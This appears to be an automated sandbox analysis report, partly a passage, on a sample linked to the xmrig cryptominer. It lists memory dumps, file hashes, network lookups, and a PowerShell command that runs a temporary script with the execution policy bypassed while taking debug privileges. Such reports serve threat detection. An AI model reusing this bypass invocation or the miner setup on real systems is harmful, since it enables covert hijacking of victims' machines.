memory/1844-15-0x000001FD79420000-0x000001FD79432000-memory.dmp
memory/1844-16-0x000001FD79400000-0x000001FD7940A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4664-47-0x000001A84D260000-0x000001A84D280000-memory.dmp
memory/4664-48-0x000001A84EB70000-0x000001A84EB90000-memory.dmp
memory/4664-49-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/1844-50-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp
memory/4664-52-0x000001A84EBB0000-0x000001A84EBD0000-memory.dmp
memory/4664-51-0x000001A84EB90000-0x000001A84EBB0000-memory.dmp
memory/1844-54-0x00007FFFD8E43000-0x00007FFFD8E45000-memory.dmp
memory/4664-53-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/1844-56-0x00007FFFD8E40000-0x00007FFFD9901000-memory.dmp
memory/4664-55-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-57-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-59-0x000001A84EBB0000-0x000001A84EBD0000-memory.dmp
memory/4664-58-0x000001A84EB90000-0x000001A84EBB0000-memory.dmp
memory/4664-60-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-61-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-62-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-63-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-64-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-65-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-66-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-67-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-68-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-69-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-70-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-71-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-72-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-73-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-74-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-75-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-76-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-77-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-78-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-79-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-80-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-81-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-82-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-83-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-84-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-85-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-86-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-87-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-88-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-89-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-90-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-91-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-92-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-93-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-94-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-95-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-96-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-97-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-98-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-99-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-100-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-101-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-102-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-103-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-104-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-105-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-106-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-107-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-108-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-109-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-110-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-111-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-112-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-113-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-114-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-115-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-116-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-117-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
memory/4664-118-0x00007FF62C910000-0x00007FF62D543000-memory.dmp
Analysis: behavioral15
Detonation Overview
Submitted
2024-05-28 01:50
Reported
2024-06-10 16:09
Platform
win10v2004-20240508-en
Max time kernel
1795s
Max time network
1800s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4328,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=3848 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3640,i,15721081447618313297,6839074028983272033,262144 --variations-seed-version --mojo-platform-channel-handle=4368 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
Files
memory/4656-0-0x00007FFDD3EB3000-0x00007FFDD3EB5000-memory.dmp
memory/4656-1-0x000001FAFC530000-0x000001FAFC552000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2hsruara.gkb.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4656-11-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp
memory/4656-12-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp
memory/4656-13-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp
memory/4656-14-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp
memory/4656-15-0x00007FFDD3EB3000-0x00007FFDD3EB5000-memory.dmp
memory/4656-16-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp
memory/4656-17-0x00007FFDD3EB0000-0x00007FFDD4971000-memory.dmp